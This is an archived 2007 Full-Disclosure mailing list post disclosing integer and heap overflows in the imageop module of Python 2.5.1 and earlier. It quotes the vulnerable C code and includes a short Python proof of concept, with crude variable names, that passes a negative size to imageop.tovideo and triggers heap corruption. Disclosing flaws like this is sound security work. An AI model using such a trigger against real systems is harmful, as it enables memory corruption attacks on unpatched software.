lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Sun, 16 Sep 2007 01:53:32 +0200
From: "Slythers Bro" <slythers@...il.com>
To: "Full-Disclosure dis" <full-disclosure@...ts.grok.org.uk>
Subject: python <= 2.5.1 standart librairy multiples int
	overflow, heap overflow in imageop module

The module imageop contains a lots of int overflow, which result in heap
overflow, and maybe memory dump.
The files imageop.c and rbgimgmodule.c are examples.


static PyObject *
imageop_tovideo(PyObject *self, PyObject *args)
{
    int maxx, maxy, x, y, len;

   ........................

    /* *************** int overflow here permit to bypass len check
******************* */

 if ( maxx*maxy*width != len ) {
        PyErr_SetString(ImageopError, "String has incorrect length");
        return 0;
    }

    rv = PyString_FromStringAndSize(NULL, len);
    if ( rv == 0 )
        return 0;
    ncp = (unsigned char *)PyString_AsString(rv);

    if ( width == 1 ) {
        memcpy(ncp, cp, maxx);        /* Copy first line */
        ncp += maxx;

/* ********** with a negativ value it's possible to bypass the code
********** */

        for (y=1; y<maxy; y++) {    /* Interpolate other lines */



-----------------------------------------------------------------------------------------------------------------------------

an IA 32 bits Proof of Concept:
*****************************************************************
import imageop

sexshit = "a"*1603
evil = "p"*5241
connard = "s"*2000
supaire= "45"*65
print supaire
connard = "cool"
salope = "suceuse"
dtc = imageop.tovideo(sexshit,1,4461,-2147002257)
sexshit = "dtc"*52
print connard,supaire," fin de dump"

**********************************************************************

www@...anticDrive:~$ python sux.py
4545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545
cool
4545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545454545
fin de dump
*** glibc detected *** corrupted double-linked list: 0x0817d3f0 ***
Abandon
www@...anticDrive:~$

ok, i hate the python's syntax, that's too old school ! :p

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ